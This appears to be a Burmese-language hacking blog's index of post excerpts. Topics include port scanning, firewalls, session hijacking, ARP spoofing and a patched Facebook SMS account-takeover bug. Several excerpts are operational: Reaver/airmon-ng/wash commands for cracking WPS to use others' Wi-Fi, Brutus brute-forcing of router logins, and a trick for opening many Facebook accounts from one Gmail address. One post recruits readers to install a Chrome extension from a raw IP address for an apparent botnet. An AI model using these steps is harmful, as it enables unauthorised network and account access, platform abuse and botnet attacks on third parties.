Port Scanning







Port Scanning ဆိုတာ ဘာလဲ ?


Port Scanning ဆိုတာ system တစ္ခုရဲ ့ open ျဖစ္ေနတဲ့ port ဒါမွမဟုတ္ active ျဖစ္ေနတဲ့ port ကို ရွာေဖြျခင္းပဲျဖစ္ပါတယ္။
ဘာနဲ ့တူသလဲဆိုေတာ့ သူခိုးက အိမ္တစ္အိမ္ရဲ ့ပြင့္ေနတဲ့ အေပါက္ကို ရွာတဲ့ သေဘာနဲ ့တူတူပါပဲ။ :P

ကဲ Port Scanning လုပ္လိုက္ပီဆိုပါေတာ့........

Starting Scan

Target Host: www.blarblarblar.com ဒါမွမဟုတ္ IP Address

TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.

ဒါဆိုရင္ေတာ့ port scan လုပ္လိုက္တဲ့ domain ဒါမွမဟုတ္ ip address မွာ active ျဖစ္ေနတဲ့ port ေတြကို ေဖာ္ျပေပးေနမွာျဖစ္ပါတယ္။

ဘယ္လို အသံုးခ်မလဲ ?


အဲ့ ရလာတဲ့ active ျဖစ္ေနတဲ့ port ဒါမွမဟုတ္ open ျဖစ္ေနတဲ့ port သိရရင္ ဘာလုပ္လို ့ရသလဲ ဆိုေတာ့ အဲ့ port ကေနျပီးေတာ့ အဲ့ဒီ system ကို remotely အသံုးျပဳလို ့ရႏုိင္ပါတယ္။ ဒါဆိုရင္ေတာ့ အဲ့ဒီ system ထဲက data ေတြကို ရယူလို ့ရတယ္ဆိုတာ ေျပာစရာမလိုေလာက္ေတာ့ပါဘူး။

Open ျဖစ္ေနတဲ့ port ကို scan လုပ္တဲ့ နည္း ၂ နည္း 

( က်ေနာ္ သိသေလာက္ေနာ္ ဒီ ့ျပင္နည္းလည္း ရွိႏုိင္ပါတယ္ )


  • Scan a single IP address for open ports:
 ဒီနည္းက ဘာနဲ ့တူလဲဆိုေတာ့  အိမ္တစ္အိမ္မွာရွိတဲ့ ပြင့္ေနတဲ့ ဘယ္ တံခါးေပါက္ကိုမဆို ရွာေဖြတာနဲ ့အတူတူပါပဲ။ ဒီေနရာမွာ အိမ္ ဆိုတာ က်ေနာ္တို ့ scan လုပ္လိုတဲ့ ip address ကိုဆိုလိုတာျဖစ္ျပီး ပြင့္ေနတဲ့ တံခါးေပါက္ဆိုတာကေတာ့ open port ကို ဆိုလိုတာပါ။
Single IP တစ္ခု ရဲ ့ Open port ကို scan လုပ္ျခင္းပါပဲ။
ဥပမာ ။  ။ searching for active ports only at 123.xx.xx.xx

  • Scan a range of IP address to find open ports:
ဒီနည္းကေတာ့ လမ္းတစ္လမ္းမွာ ရွိတဲ့ တံခါး ပြင့္ေနတဲ့ အိမ္တစ္အိမ္ကို ရွာေဖြတာနဲ ့ခပ္ဆင္ဆင္ပါပဲ။

ဒီမွာလည္း လမ္းတစ္လမ္းမွာ ရွိတဲ့ တံခါးပြင့္ ေနတဲ့ အိမ္တစ္အိမ္ ဆိုတာ Range of IP address ကို ဆိုလိုတာပါ။
ဥပမာ ။ ။ searching active ports only at 123.20.xx.xx to 123.30.xx.xx


Read more


What is Firewall?

Introduction to Firewall


ကြ်န္ေတာ္တို ့ေက်ာင္းေတြမွာ ဒါမွမဟုတ္ ရံုးခန္းေတြမွာ အင္တာနက္ အသံုးျပဳတဲ့အခါမွာ အခ်ိဳ ့ website (အထူးသျဖင္ ့ social site ေတြျဖစ္တဲ့ Facebook တို ့ Twitter တို ့) ေတြကို အသံုးျပဳလို ့မရပါဘူး။
အဲ့လို အသံုးျပဳလို ့မရေအာင္ Firewall ကို အသံုးျပဳျပီး block ထားၾကတာပါ။ ေနာက္ျပီးေတာ့ Firewall ဟာ Hacker ေတြရဲ ့ရန္ကလည္း ကာကြယ္ေပးပါတယ္ (၁၀၀% ေတာ့မဟုတ္ဘူးဗ်.. ဘာလို ့လဲဆိုေတာ့ firewall ကို ေဖာက္လို ့ရတဲ့ နည္းေတြအမ်ားၾကီးရွိလို ့ :P)
ကဲ ဒါျဖင့္ Firewall ဆိုတာ ဘာလဲ သိဖို ့ဆက္ေလ့လာလိုက္ရေအာင္............


What is Firewall?


Firewall ကို ဥပမာေပးျပီးေျပာရမယ္ဆုိရင္ ဘာနဲ ့တူလဲဆိုေတာ့ ရံုးခန္း အျပင္ဘက္မွာ ေစာင့္တဲ့ လံုျခံဳေရး၀န္ထမ္း နဲ ့တူတယ္လို ့ေျပာလို ့ရတယ္ဗ်။
အဲ့ ရံုးခန္းက လံုျခံဳေရး ၀န္ထမ္းေတြ ရဲ ့တာ၀န္က ဘာလဲ ဆိုတာ အားလံုးသိၾကတဲ့အတိုင္းပဲ ID card အေထာက္အထားျပ ႏိုင္တဲ့သူကို ေတာ့ ရံုးခန္းထဲ ေပး၀င္တယ္ ID အေထာက္အထားမျပႏိုင္တဲ့ သူေတြကိုေတာ့ block လုပ္ထားေပးတယ္။ အဲ့သေဘာတရားအတိုင္းပဲ Firewall ဟာ System ထဲကို ၀င္လာမယ့္ unauthorized access ေတြကို block လုပ္ေပးထားပါတယ္။
Firewall ဟာ Software လဲျဖစ္ႏုိင္သလို Hardware လဲျဖစ္ႏုိင္ပါတယ္။ သူက Administrator က define လုပ္လိုက္တဲ့ rule ေတြအတိုင္ set လုပ္ျပီးေတာ့ အလုပ္လုပ္ပါတယ္။ Firewall Administrator ကို အသံုးျပဳျပီးေတာ့ website တစ္ခုခ်င္းစီကုိ access လုပ္လို ့မရေအာင္ block လုိ ့ရပါတယ္။

- Traffic အားလံု ( အ၀င္၊အထြက္ ) ဟာ Firewall ကို ျဖတ္ျပီးသြားရပါတယ္။
- Admin က authorized ေပးတဲ့ traffic ပဲ ေပးျဖတ္ပါတယ္။ မဟုတ္ရင္ေတာ့ block လုပ္လိုက္ပါတယ္။




Types of Firewall


  •  Packet Filtering
  •  Appliction level gate way
  •  Circuit level gate way

Packet Filtering ( Network Layer )


Packet Filtering Router ဟာ  incoming IP တစ္ခုခ်င္းစီကို admin က set လုပ္ထားတဲ့ rules ေတြကို apply လုပ္ပါတယ္။ ျပီးေတာ့မွ forward လုပ္သင့္တာကို လုပ္ discard လုပ္သင့္တာကို လုပ္တာပါ။ Router ကို အ၀င္အထြက္ေတြအတြက္ filter လုပ္ဖို ့ config လုပ္ထားတဲ့သေဘာပါပဲ။
ဒီ Packet Filtering မွာအဓိက သတိထားရမွာက IP Spoofing Attack ပါပဲ။ ဘယ္လို achieved လုပ္သြားလဲဆိုေတာ့ packet ရဲ ့IP source ကို change လုပ္ျပီး achieved လုပ္သြားတာပါ။

Appliction level gate way

ဒါကို proxy server လုိ ့လည္း လူသိမ်ားပါတယ္။ user က  TCP/IP layer ကို အသံုးျပဳျပီးေတာ့ gateway နဲ communicate လုပ္တာပါ။ Gateway က connect လုပ္မယ့္ remote host ရဲ ့နာမည္ကို ေမးပါလိမ့္မယ္။
User ကသာ valid ျဖစ္တဲ့ user ID ကို ထည့္လိုက္မယ္ဆိုရင္ Gateway ကေနျပီးေတာ့ remote access ျပန္ေပးပါလိမ့္မယ္။
Packet Filtering နည္းထက္ပို ျပီး လံုျခံဳမွဳရွိပါတယ္။ incoming traffic ေတြကို အလြယ္တကူ audit လုပ္လို ့ရပါတယ္။ Application-level filtering မွာ spam, virus ေတြကို လည္းကာကြယ္ေပးပါတယ္။

Circuit level gate way

Circuit level gate way  ကေတာ့ OSI model ေတြရဲ ့session layer မွာ အလုပ္လုပ္ပါတယ္။ Monitor TCP နဲ ့packets ေတြကို legitimate ျဖစ္ေအာင္ လုပ္ေပးပါတယ္။ Traffic filter ကေတာ့ session rules ေတြေပၚမွာပဲ အေျခခံပါတယ္။
Circuit-level firewalls မွာေတာ့ network ကို hide လုပ္ေပးထားပါတယ္။ ဒီေကာင္က denying access လုပ္တဲ့အခါမွာ အသံုး၀င္ပါတယ္။ ဒါေပမယ့္ packet တစ္ခုခ်င္းစီကုိေတာ့ filter မလုပ္သင့္ပါဘူး။

Why Firewall?


Firewall ဟာ unauthorized users ေတြကို block လုပ္ေပးပါတယ္။ network ထဲကုိ vulnerable services ေတြ prohibits လုပ္ေပးပါတယ္။
IP spoofing နဲ ့routing attack ေတြရန္ကေန ကာကြယ္ေပးပါတယ္။
Remote login, Trojan backdoors, Session hijacking, cookie stealing စတာေတြကိုလည္း ကာကြယ္ေပးပါတယ္။
ဒါေတြေၾကာင့္ Firewall ကို အသံုးျပဳေနၾကတာပါ။

Limitation of Firewalls


Firewall ဟာ  by pass firewall attack method ကို မကာကြယ္ေပးႏိုင္ပါဘူး။
internal threats ေတြကိုလည္း မကာကြယ္ေပးႏုိင္ပါဘူး။
virus infected ျဖစ္ေနတဲ့ progams (or) files ကို transfer လုပ္ျခင္းကိုလည္းမကာကြယ္ႏုိင္ပါဘူး။

Read more


Session Hijacking

Session Hijacking ဆိုတာဘာလဲ ?


Session Hijacking လုပ္တယ္ဆိုတာ ရွိျပီးသား active session တစ္ခုကို ခိုးယူျခင္းပဲျဖစ္ပါတယ္။ Session Hijacking လုပ္ျခင္းရဲ ့အဓိက ရည္ရြယ္ခ်က္ကေတာ့ authentication process ကို bypass လုပ္ျခင္းျဖင့္ website တစ္ခု သို ့မဟုတ္ computer တစ္လံုးကုိ unauthorized access ကို ရယူဖို ့ပဲျဖစ္ပါတယ္။
အရိုးရွင္းဆံုးေျပာရရင္ေတာ့ attacker ဟာ တစ္ျခား client တစ္ေယာက္ရဲ ့ session နဲ ့login လုပ္ျခင္းပဲျဖစ္ပါတယ္။

Session Hijacking ကို ဘယ္လို Method ေတြနဲ ့ လုပ္မလဲ 


 1. Session fixation: 

ဒီ Method ကေတာ့  attacker ဟာ victim ရဲ ့ user session ID ကို set လုပ္ျခင္းပဲျဖစ္ပါတယ္။
ဥပမာ.. attacker ဟာ victim ဆီကို သူကိုယ္တိုင္ set လုပ္ထားတဲ့ session ID တစ္ခုပါ၀င္တဲ့ link တစ္ခုကို mail ကေန တဆင့္ေပးပို ့ပါမယ္။ တကယ္လို ့ victim ကသာ အဲ့လင့္ကို ႏွိပ္လိုက္မယ္ဆိုရင္ျဖင့္ အဲ့ victim ရဲ ့ user session ID ဟာ attacker set လုပ္ေပးလိုက္တဲ့ အတိုင္း ေျပာင္းလဲသြားမွာျဖစ္ပါတယ္။
ဒီလို နည္းလမ္းနဲ ့အဲ့ဒီ victim ရဲ ့session ကို hijack လုပ္ယူသြားျခင္းပဲျဖစ္ပါတယ္။


2. Session SideJacking(session Sniffing):



ဒီ Method ကေတာ့  attacker ဟာ packet sniffing ကို အသံုးျပဳျပီးေတာ့ session cookie ကို ခိုးယူျခင္းပဲျဖစ္ပါတယ္။ အဲ့ဒါကို ကာကြယ္ဖို ့အခ်ိဳ ့ website ေတြက SSL(encrypts the session) ကို အသံုးျပဳၾကပါတယ္။ ဒါေပမယ့္ authenticated တစ္ခါ ျဖစ္ျပီးသြားျပီ ဆိုတာနဲ ့ အဲ့ encryption ကို ထပ္မသံုးသင့္ေတာ့ပါဘူး။ ဘာျဖစ္လို ့လဲဆိုေတာ့ အဲ့လို လုပ္ျခင္းျဖင့္ attacker ကို network traffic ကို ဖတ္ရွဳခြင့္ရရွိသြားျပီးေတာ့ server data ေတြကို ၾကားက ျဖတ္ယူႏိုင္မွာျဖစ္ပါတယ္။

3. Client-side attacks (XSS, Malicious JavaScript Codes, Trojans, etc):


Attacker ေတြဟာ Javascript codes ေတြကို client system ထဲမွာ run ေပးျခင္းျဖင့္ Session ကို ခုိးယူလို ့ရပါတယ္။ ပံုမွန္အားျဖင့္ေတာ့ ဒီ Method ျဖင့္ XSS အသံုးျပဳတဲ့ website ေတြကေနတဆင့္ client ကိုတိုက္ခိုက္ေလ့ ရွိပါတယ္။
Client အေနနဲ ့ကလည္း ယံုၾကည္ရတယ္ထင္တဲ့ website ကိုအသံုးျပဳသင့္ပါတယ္။ ဒီလိုမွမဟုတ္ပဲ attacker ေတြရဲ ့Malicious Javascript codes ေတြပါ၀င္တဲ့ website link ကိုသာ ႏွိပ္လိုက္မိလို ့ကေတာ့ Session cookies ေတြနဲ ့အျခား confidential data ေတြ ခိုးယူျခင္းခံရမွာျဖစ္ပါတယ္။

4. Physical access:


တကယ္လို ့Attacker ကသာ Physical access လုပ္ဖို ့အခြင့္အေရးရခဲ့ရင္ေတာ့  Session ေတြကို ခိုးယူဖို ့သူ ့အတြက္ပိုမုိလြယ္ကူပါတယ္။ အမ်ားအားျဖင့္ ဒီလို Physical access ေတြအျဖစ္မ်ားတာက Public Internet Cafe ေတြ Internet ဆိုင္ေတြမွာ အျဖစ္မ်ားပါတယ္။ Client တစ္ေယာက္ဟာ website တစ္ခုကို login လုပ္ျပီး အသံုးျပဳခဲ့မယ္။ ( ဥပမာ facebook တို ့ gmail ) အဲ့ Client လဲ အသံုးျပဳျပီးေရာ အဲ့စက္ကို attacker တစ္ေယာက္ အသံုးျပဳဖို ့ေရာက္လာရင္ေတာ့ Session Cookie ေတြကို အလြယ္တကူ ခိုးယူျပီး access ရယူသြားႏုိင္မွာျဖစ္ပါတယ္။


Read more


ARP SPOOFING ဆိုတာဘာလဲ


ARP Spoofing ဆိုတာ ကြ်န္ေတာ္ နားလည္သေလာက္ေျပာရမယ္ဆိုရင္ေတာ့ Attacker ေတြက fake Address Resolution Protocol (ARP) ေတြကို Local Area Network ထဲကို ပို ့လႊတ္တာပဲျဖစ္ပါတယ္။
(ကြ်န္ေတာ္သိထားသေလာက္ေျပာတာေနာ္ မျပည့္စံုတာ အမွားအယြင္းပါတယ္ ဆိုရင္ေတာ့ နားလည္သူမ်ား comment ခ်န္ခဲ့ပါ ျပင္သင့္ရင္ ျပင္ပါ့မယ္)

ARP Spoofing လုပ္ျခင္းျဖင့္ Attacker ဟာ LAN ထဲမွာရွိတဲ့ Data Frames ေတြကို intercept လုပ္ျခင္း ၊
traffic ကို modify လုပ္ျခင္း ၊ ဒါမွ မဟုတ္ traffic ကို လံုး၀ stop ျခင္းမ်ား ျပဳလုပ္ေလ့ရွိပါတယ္။

တစ္ခါတစ္ေလ က်ေတာ့ Attacker ေတြဟာ တျခား attack လုပ္ဖို ့အတြက္ ေရွ ့ေျပး အေနနဲ ့ ARP Spoofing လုပ္ေလ့ရွိပါတယ္။ ဥပမာ denial of service တို ့ man in the middle ဒါမွမဟုတ္ session hijacking attacks လုပ္ဖို ့အတြက္ ARP Spoofing ျပဳလုပ္ေလ့ရွိပါတယ္။


Read more


Kali Linux မွာပါတဲ့ Reaver tool ကိုအသံုးျပဳျပီး WPA & WPA2 ကို Crack နည္း


ဒီ Tutorial က Wifi Router ရဲ ့ PSK ( Pre-Share Key ) ကို ရဖို ့အတြက္  WPS (Wi-Fi Protected Setup) ကို Bruteforce လုပ္မွာပဲျဖစ္ပါတယ္။

ကဲစလိုက္ၾကရေအာင္
အရင္ဆံုး Terminal ကို ဖြင့္ပါ။
ဖြင့္ျပီးရင္ ေအာက္မွာ ေဖာ္ျပထားတဲ့ command ေတြကို အသံုးျပဳရမွာျဖစ္ပါတယ္

airmon-ng
airmon-ng stop [
wlan0]
airodump-ng [
wlan0]
မွတ္ခ်က္။ ။  [wlan0] ဆိုတဲ့ေနရာမွာ သင္ crack လုပ္မယ္ wifi ရဲ ့interface ကိုထည့္ရမွာျဖစ္ပါတယ္။ က်ေနာ္ကေတာ့ ဒီမွာ wlan0  နဲ ့ဥပမာ ေပးထားပါတယ္။

ေနာက္ထပ္ Terminal အသစ္တစ္ခုကို ထပ္ဖြင့္ပါ။

wash -i [wlan0] -c CHANNEL_NUM -C -s
ျပီးရင္ ေနာက္ထပ္ Terminal အသစ္တစ္ခု ထပ္ဖြင့္ရအံုးမယ္ဗ်။


reaver -i [wlan0] -b [BSSID] --fail-wait=360

ဒါပါပဲ
WPS pin ကို crack ဖို ့အတြက္ကေတာ့ အနည္းဆံုးအခ်ိန္ ၄ နာရီ ကေန ၁၀ နာရီ ၾကားထဲမွာ ၾကာမွာျဖစ္ပါတယ္။ :P 
သူမ်ားဟာ ခိုးသံုးဖို ့ crack တာပဲ password သြားေမးတာ ထက္ေတာ့ ၾကာမွာေပါ့ေနာ္ :D

Read more


Facebook account lock က်လို ့ Photo Verification လုပ္ခိုင္းရင္ ဘယ္လို လုပ္မလဲ


Facebook Account lock က်တဲ့အခါမွာ ျပန္ျဖည္ဖို ့အတြက္ photo tag ေတြနဲ ့ verification လုပ္ၾကရတာ ၾကံဳဖူးၾကမယ္ထင္တယ္ဗ်။ ကြ်န္ေတာ္ကိုယ္တိုင္လဲ ခနခန ၾကံဳဖူးတယ္ ပိုဆိုးတာက ကြ်န္ေတာ့ account ထဲက friends ေတာ္ေတာ္မ်ားမ်ား က မ်က္ႏွာဖံုးေတြနဲ ့ ျဖစ္ေနၾကေတာ့ ကြ်န္ေတာ္ကိုယ္တိုင္လဲ ေတာ္ေတာ္ တိုင္ပတ္ခဲ့တယ္ဗ်။

ဒါေပမယ့္ သာမန္ facebook user ေတြအေနနဲ ့အထူးသျဖင့္ friend မ်ားတဲ့လူေတြအတြက္ေတာ့ lock က်သြားလို ့ photo verification ျပန္လုပ္တဲ့အခါ အခက္အခဲ အနည္းငယ္ ရွိတယ္ဗ်။ အဲ့ဒါကေတာ့ verification လုပ္ခိုင္းတဲ့ photo ပိုင္ရွင္ေတြကို နာမည္နဲ ့တြဲျပီး မမွတ္မိၾကတာပါ။

အဲ့ဒါကို ေျဖရွင္းဖို ့ bypass နည္းလမ္းေလး ေျပာျပခ်င္ပါတယ္။

account lock က်လို ့ photo verification လုပ္ခိုင္းတဲ့အခါ ကိုယ္မသိတဲ့ သူ ရဲ ့photo ပါလာခဲ့ရင္ေတာ့ photo ေအာက္မွာ ေရြးခိုင္းတဲ့ account name ေတြထဲက တစ္ခုခ်င္းဆီကို google image search မွာ ယခုလို ရိုက္ပီး ရွာေဖြ ႏိုင္ပါတယ္

facebook + (ေရြးခိုင္းတဲ့ account name တစ္ခု)

အဲ့လို ရွာလိုက္တဲ့အခါ အဲ့ account ပိုင္ရွင္ရဲ ့ photo ကုိ search result ရဲ ့ ပထမဆံုး ေဖာ္ျပတဲ့ ၃ ပံုအတြင္းမွာ ပါမွာျဖစ္ျပီး photo verification လုပ္ခိုင္းတဲ့ ပံု ထဲ ပါမပါ တိုက္ဆိုင္ စစ္ေဆးႏုိင္ပါတယ္
ဒီလိုနည္းနဲ ့ တစ္ခုျပီးတစ္ခု ကို တိုက္ဆိုင္ စစ္ေဆးျပီး မွန္မွန္ကန္ကန္ verify လုပ္ႏုိင္မွာျဖစ္ပါတယ္။

ဒီေနရာမွာ အေရးၾကီးတာက တကယ္လို ့ ကံမေကာင္းလို ့ no verification method is available
now ဆိုရင္ေတာ့ ပထမဆံုးအၾကိမ္ ၁ နာရီ ထပ္ေစာင့္ျပီး ျပန္ try လုပ္ၾကည့္ပါ။

ဒုတိယအၾကိမ္ထပ္ျဖစ္တယ္ဆိုရင္ေတာ့ ၂၄ နာရီ ေစာင့္ျပီးမွ ျပန္ try လို ့ရပါမယ္။

Note .... မၾကာေသးမီ ရက္ပိုင္းကပဲ facebook က Policy တစ္ခ်ိဳ ့ေျပာင္းလဲလိုက္ပီျဖစ္ပါတယ္ အဲ့ဒါကေတာ့ close friends လို ဟာမ်ိဳး ထဲမွာ ရင္းႏွီးတဲ့ သူမ်ား ကို list ထည့္ထားမယ္ဆိုရင္ account lock က်သြားခဲ့ရင္ေတာင္မွ အဲ့ လူေတြရဲ ့ Photo ေတြနဲ ့ပဲ verification လုပ္ခိုင္းပါေတာ့တယ္။

ဒီလိုနည္းနဲ ့ account lock က်ခဲ့ရင္ ျပန္လည္ရယူႏုိင္ၾကပါေစဗ်ာ......

Read more


Gmail Account တစ္ခုတည္းနဲ ့ Facebook Account ေတြ အမ်ားၾကီးဖြင့္ၾကမယ္

တကယ္ေတာ့ အားလံုးသိထားၾကတာ gmail account တစ္ခုကုိ facebook account တစ္ခုပဲ ဖြင့္လို ့ရတယ္ လို ့ပဲ သိထားၾကတယ္။

တဂယ္လဲ facebook က mail တစ္ခုကို account တစ္ခုပဲ ေပးဖြင့္တယ္။

ဒါေပမယ့္ က်ေနာ့္မွာ mail account တစ္ခုတည္းနဲ ့ facebook account ေတြ အမ်ားၾကီးဖြင့္လို ့ရတဲ့နည္းရွိတယ္။

အရင္ဆံုး အသံုးျပဳမယ့္ mail က ဥပမာအေနနဲ ့ koalpha@gmail.com ပဲဆိုပါစို ့။

www.facebook.com ကို သြားျပီးေတာ့ sign up လုပ္ပါ။

အဲ့လို sign up လုပ္တဲ့ေနရာမွာ name တို ့ Date of Birth စသည္ျဖင့္ အားလံုးကို ပံုမွန္အတိုင္းပဲျဖည့္လုိက္ပါ။

ဒါေပမယ့္ email address ဆိုတဲ့ေနရာမွာ Fake email ဒါမွမဟုတ္ မရွိတဲ့ mail address တစ္ခုကုိ ျဖည့္လိုက္ျပီး sign up လုပ္လုိက္ပါ။ အျခား sign up လုပ္တဲ့ step ေတြကိုလည္း ပံုမွန္အတိုင္းပဲ အဆင့္ဆင့္လုပ္သြားပါ။

အဲ့ဒါဆိုရင္ email address နဲ ့ပတ္သတ္ျပီး သင္ထည့္လိုက္တဲ့ mail ကို verify လုပ္လို ့မရဘူး mail မွားေနတယ္လို ့ error message က်လာပါလိမ့္မယ္။

အဲ့အခါက်မွ change email address ကို ႏွိပ္လုိက္ျပီးေတာ့ ခုနက တကယ္ အသံုးျပဳမယ့္ mail ျဖစ္တဲ့          ( koalpha@gmail.com ) အစား k.oalpha@gmail.com လို ့ျဖည့္လိုက္ပါ။

ဒါဆိုရင္ ဘာျဖစ္သြားမယ္ထင္လဲ verification mail က koalpha@gmail.com ကို verify လုပ္သြားမွာျဖစ္ပါတယ္။
ဒီေနရာမွာ တစ္ခုရွိတာက တုိက္တိုက္ဆိုင္ဆိုင္ အဲ့ k.oalpha@gmail.com က တကယ္ ရွိေနရင္ေတာ့ မရဘူးေပါ့ဗ်ာ ဒါကလဲ ေတာ္ေတာ္တုိက္ဆုိင္မွပါ။

ဒီလိုဆိုရင္ေတာ့ koalpha@gmail.com ကို အသံုးျပဳျပီးေတာ့ facebook account တစ္ခုရသြားျပီျဖစ္ပါတယ္။

ဒါဆို ေနာက္ထပ္ facebook account တစ္ခု ထပ္ဖြင့္ရေအာင္

အထက္က sign up လုပ္တဲ့ အဆင့္ေတြအတိုင္းပဲ လုပ္ပါ

ဒါေပမယ့္ ပထမတစ္ခါတုန္းက k.oalpha@gmail.com နဲ ့ လုပ္ရင္ေနာက္တစ္ခါ ko.alpha@gmail.com နဲ ့ေျပာင္းလုပ္ပါ။ ဒါလဲအတူတူပဲ koalpha@gmail.com ကို ပဲ verification ေပးမွာပဲ

အဲ့လိုနည္းနဲ ့ dot ေတြကို ေနရာေျပာင္းေျပာင္းျပီး facebook account မ်ားစြာကို ဖြင့္သြားလို ့ရပါတယ္
verification mail ကေတာ့ တစ္ခုတည္းေပါ့

dot တစ္လံုးတည္းကို ေနရာေျပာင္းဖြင့္တာမွ မလံုေလာက္ေသးဘူး ထပ္ဖြင့္ခ်င္ေသးတယ္ဆိုရင္ dot ႏွစ္လံုးလဲဖြင့္လို ့ရပါတယ္ ဥပမာ ko.al.pha@gmail.com ဆိုရင္လဲ ရတယ္လို ့ေျပာတာပါ။

စမ္းၾကည့္ၾကပါကုန္ :D


Read more


Cracking Router's Username & Password

Router တစ္လံုးကို Access လုပ္ဖို ့အတြက္ Username နဲ ့ Password လုိအပ္ပါတယ္။
ဘယ္ အမ်ိဳးအစား Router ျဖစ္ျဖစ္ သူ ့ရဲ ့ Default Username နဲ ့ Password ကို သိရင္ Access လုပ္လို ့ရပါတယ္။


အဲ့ဒါကေတာ့ Password Protection လုပ္ထားတာပါ။

ပထမဆံုးအေနနဲ ့ Brutus ကို အသံုးျပဳဖို ့လိုအပ္ပါတယ္။

Brutus ကို ဖြင့္ပါ။

ျပီးရင္ Brutus Configuration ထဲက Target ေနရာမွာ Router ရဲ ့ IP Address ျဖည့္ပါ
User File နဲ ့ Pass File မွာ brute force လုပ္ဖို ့အတြက္  User File ထဲမွာ Username list နဲ ့ Pass File ထဲမွာ Password list ကို ထည့္ေပးရမွာျဖစ္ပါတယ္။

အားလံုး ျဖည့္ျပီးရင္ေတာ့ Start ကို ႏွိပ္လုိက္ပါ။



ဒါဆိုရင္ေတာ့ Brutus က Router ကို Crack လုပ္ေနျပီျဖစ္ပါတယ္


Crack လုပ္တာ ျပီးတဲ့ အထိေစာင့္ျပီးရင္ေတာ့ Router အတြက္ Username နဲ ့ Password ရမွာျဖစ္ပါတယ္။


ဒါဆိုရင္ေတာ့ Username နဲ့ Password ျဖည့္ျပီး Router ထဲ ၀င္လို ့ရျပီ ျဖစ္ပါတယ္။


Read more


Myanmar Cyber Army Reloaded Project is Avaliable Now!

MCA : Reloaded Project ကိုု ဖြင့္လွစ္လိုုက္ပါျပီ... Chrome Browser ရွိတဲ့ လူေတြကေတာ့ ေအာက္ေဖၚျပပါ လိပ္စာမွ Chrome Browser Icon ကိုု နွိပ္ေပးျပီး "Add to Chrome" ကိုု နွိပ္ျပီး ေတာ့ Popup ထဲမွာ Add button ကိုု ထပ္နွိပ္ေပးျခင္းျဖင့္ ပါ၀င္ ဆင္ႏဲြႏိုုင္ပါတယ္၊

MCA Moderators မ်ားကေတာ့ computer ေပါင္း ၂၀၀၀ ေက်ာ္ ပါ၀င္ျပီး ဆင္ႏြဲလာတဲ့အခါ project ကိုု ကိုုယ္တြယ္အသံုုးျပဳမူမ်ားကိုု စတင္ပါမယ္....

လိပ္စာကေတာ့ http://108.178.54.109/mca/index.html ျဖစ္ပါတယ္။


သတိျပဳရန္ ။   ။ အျခား မည္သည့္ေနရာကမွ Download မျပဳလုပ္ၾကပါႏွင့္

Read more


Facebook Bug ( Hacking Facebook with 1 SMS Only )

ဒီပိုစ့္မွာေတာ့ facebook က fixed ျပန္လုပ္ျပီးသား bug တစ္ခု အေၾကာင္းကို တင္ျပေပးသြားမွာျဖစ္ပါတယ္
ဒီ bug ကို ရွာေတြ ့ခဲ့တဲ ့ Fin1te ဆိုတဲ့ ငနဲကေတာ့ US$ 20,000 ရသြားတယ္ဗ်။

အရင္ဆံုး သေဘာတရားကို ေျပာရမယ္ဆိုရင္ေတာ့
fb က သင့္ရဲ ့account တစ္ခုအတြက္ link လုပ္ဖို ့ mobile နံပါတ္ တစ္ခုေတာင္းတယ္ဗ်
အဲ့ဒီ mobile ရဲ ့ SMS ကေနတဆင့္ fb news feed ေတြ post ေတြ ကိုလည္း update ရသလို  fb ကို login ၀င္တဲ့အခါ email address အစား အဲ့ ဖုန္းနံပါတ္ကို လည္း အသံုးျပဳလို ့ရတယ္ ဆိုတဲ့ အခ်က္ကေန အစ ဆြဲထုတ္ထားတဲ့ bug ပဲဗ်။

အဲ့ bug ရဲ ့အစကေတာ့ /ajax/settings/mobile/confirm_phone.php ရဲ ့အဆံုးပိုင္းနားမွာဗ်
account နဲ ့ phone no ခ်ိတ္တဲ့ ( verification code received via your mobile ) ရဲ ့ profile_id
က main ပဲ..

profile_id က account တစ္ခုကို account ပိုင္ရွင္ထည့္သြင္းထားတဲ့ mobile no တစ္ခုနဲ ့set လုပ္ျပီးသား အဲ့ဒါကို account ပိုင္ရွင္ မသိလိုက္ သတိမထားမိလိုက္ပဲ verification လုပ္တဲ့ mobile no ကို ေျပာင္းလို ့ရပါတယ္။

( ေအာက္မွာ ဆက္လက္ေဖာ္ျပထားေသာ exploit မ်ားသည္ မူလ bug ကို exploit လုပ္ထားသူ Fin1te ရဲ ့ UK မွ ျပဳလုပ္ပံု အဆင့္ဆင့္ျဖစ္ပါသည္ )

အရင္ဆံုး facebook SMS short code ျဖစ္တဲ ့ "F" ဆိုတဲ့ letter ကို 32665 သို ့ Send လုပ္လုိက္ပါ
ဒါဆိုရင္ေတာ့ character ၈ခု ပါတဲ ့ verification code တစ္ခု ကို receive ျပန္ရမွာျဖစ္ပါတယ္


ျပီးရင္ေတာ့ ဒီေနရာက code ကို ေအာက္က ေပးထားတဲ့ ပံုထဲကအတိုင္း modify လုပ္သြားတာပါ

profile_id element ထဲမွာ ကိုယ္ redirect လုပ္ခ်င္တဲ့ ကိုယ့္ mobile no ကို ျဖည့္သြားတာပါ။

ဒါဆိုရင္ေတာ့ မူလ user ရဲ ့value of __user နဲ ့ ကြ်န္ေတာ္တို ့ခုနက edit လုပ္ျပီး ျပင္လိုက္တဲ့ profile_id နဲ ့မတူေတာ့ဘူးဆိုတာကို ေတြ ့ရတယ္ခင္ဗ်။


ျပီးရင္ေတာ့ SMS နဲ ့တဆင့္ Confirmation ရမွာျဖစ္ပါတယ္





ဒီကေနမွတဆင့္ password reset ကို ေျပာင္းလဲထားတဲ့ mobile no ရဲ ့ SMS ကတဆင့္ reset ခ်သြားတာပါ။

ေနာက္ထပ္ SMS တစ္ေစာင္ ထပ္ေရာက္ပါေသးတယ္ အဲ့ဒါကေတာ့ password reset code ပဲျဖစ္ပါတယ္


ဒါဆိုရင္ေတာ့ ရရွိလာတဲ့ code ကို ျဖည့္ျပီး password အသစ္ ကိုေပးလိုက္မယ္ဆိုရင္
ပြဲသိမ္းသြားျပီေပါ့....


Read more


Hotspot Shield တစ္ခုကို Ads free, Banners free ျဖစ္ေအာင္ Tool မသံုးပဲ Crack နည္း

